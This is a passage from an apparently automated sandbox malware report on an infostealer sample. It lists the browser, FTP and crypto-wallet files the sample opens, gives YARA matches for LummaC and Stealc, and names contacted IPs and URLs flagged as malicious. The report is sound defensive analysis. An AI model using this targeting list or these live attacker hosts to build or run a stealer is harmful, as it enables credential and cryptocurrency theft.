Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008515001\f20b4c0961.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000009.00000003.2189000814.0000000001176000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2363128747.0000000000700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2402388484.0000000000700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2216205547.0000000001176000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2187778263.0000000001176000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2163858876.0000000001176000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2326994165.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2429429740.0000000000700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2321812424.0000000000716000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2164221941.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2321730162.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2240820571.0000000001176000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: f20b4c0961.exe PID: 3576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: f20b4c0961.exe PID: 3848, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 00000038.00000003.2755283804.0000000001236000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d146970153.exe PID: 7652, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: f20b4c0961.exe PID: 3576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: f20b4c0961.exe PID: 3848, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 0000000A.00000003.2212530060.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2702954448.0000000000AA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2408464145.0000000000AA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2254292302.000000000128E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2253374920.0000000000AA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2416102733.000000000174B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2706190538.0000000001442000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.2356073494.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.2612937099.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: e2af9f55fd.exe PID: 3684, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561598 Sample: 2fQ8fpTWAP.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 84 youtube.com 2->84 86 spocs.getpocket.com 2->86 88 14 other IPs or domains 2->88 110 Suricata IDS alerts for network traffic 2->110 112 Found malware configuration 2->112 114 Antivirus detection for URL or domain 2->114 116 15 other signatures 2->116 9 skotes.exe 4 26 2->9         started        14 2fQ8fpTWAP.exe 5 2->14         started        16 f20b4c0961.exe 12 2->16         started        18 7 other processes 2->18 signatures3 process4 dnsIp5 104 185.215.113.43, 49709, 49710, 49713 WHOLESALECONNECTIONSNL Portugal 9->104 106 185.215.113.16, 49711, 49715, 49728 WHOLESALECONNECTIONSNL Portugal 9->106 72 C:\Users\user\AppData\...\44452951d3.exe, PE32 9->72 dropped 74 C:\Users\user\AppData\...\d146970153.exe, PE32 9->74 dropped 76 C:\Users\user\AppData\...\e2af9f55fd.exe, PE32 9->76 dropped 82 5 other malicious files 9->82 dropped 144 Creates multiple autostart registry keys 9->144 166 3 other signatures 9->166 20 f20b4c0961.exe 12 9->20         started        24 44452951d3.exe 9->24         started        26 e2af9f55fd.exe 13 9->26         started        28 d146970153.exe 9->28         started        78 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->78 dropped 80 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->80 dropped 146 Detected unpacking (changes PE section rights) 14->146 148 Tries to evade debugger and weak emulator (self modifying code) 14->148 150 Tries to detect virtualization through RDTSC time measurements 14->150 30 skotes.exe 14->30         started        152 Query firmware table information (likely to detect VMs) 16->152 154 Found many strings related to Crypto-Wallets (likely being stolen) 16->154 156 Tries to harvest and steal ftp login credentials 16->156 168 2 other signatures 16->168 36 2 other processes 16->36 158 Writes to foreign memory regions 18->158 160 Allocates memory in foreign processes 18->160 162 Excessive usage of taskkill to terminate processes 18->162 164 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 18->164 32 taskkill.exe 18->32         started        34 firefox.exe 18->34         started        38 7 other processes 18->38 file6 signatures7 process8 dnsIp9 90 property-imper.sbs 172.67.162.84, 443, 49712, 49714 CLOUDFLARENETUS United States 20->90 118 Antivirus detection for dropped file 20->118 120 Multi AV Scanner detection for dropped file 20->120 122 Detected unpacking (changes PE section rights) 20->122 136 3 other signatures 20->136 40 chrome.exe 20->40         started        124 Machine Learning detection for dropped file 24->124 126 Modifies windows update settings 24->126 138 3 other signatures 24->138 92 185.215.113.206, 49719, 49778, 80 WHOLESALECONNECTIONSNL Portugal 26->92 128 Tries to detect sandboxes and other dynamic analysis tools (window names) 26->128 140 2 other signatures 26->140 130 Binary is likely a compiled AutoIt script file 28->130 132 Excessive usage of taskkill to terminate processes 28->132 43 taskkill.exe 28->43         started        45 taskkill.exe 28->45         started        47 taskkill.exe 28->47         started        53 3 other processes 28->53 142 2 other signatures 30->142 134 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 32->134 94 youtube.com 142.250.181.78, 443, 49773, 49774 GOOGLEUS United States 34->94 96 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 49775, 80 GOOGLEUS United States 34->96 98 5 other IPs or domains 34->98 49 firefox.exe 34->49         started        51 firefox.exe 34->51         started        55 2 other processes 36->55 57 7 other processes 38->57 signatures10 process11 dnsIp12 100 192.168.2.8, 443, 49703, 49704 unknown unknown 40->100 102 239.255.255.250 unknown Reserved 40->102 59 chrome.exe 40->59         started        62 conhost.exe 43->62         started        64 conhost.exe 45->64         started        66 conhost.exe 47->66         started        68 conhost.exe 53->68         started        70 conhost.exe 53->70         started        process13 dnsIp14 108 www.google.com 142.250.181.68 GOOGLEUS United States 59->108
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
172.67.162.84
 property-imper.sbs United States
13335 CLOUDFLARENETUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 prod.ads.prod.webservices.mozgcp.net United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
239.255.255.250
 unknown Reserved
unknown unknown false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.181.68
 www.google.com United States
15169 GOOGLEUS false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
142.250.181.78
 youtube.com United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false

Private

IP
192.168.2.8
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
ipv4only.arpa 192.0.0.170 true
property-imper.sbs 172.67.162.84 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
www.google.com 142.250.181.68 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.181.78 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
spocs.getpocket.com unknown unknown
detectportal.firefox.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
shavar.services.mozilla.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    https://property-imper.sbs/api false
      		high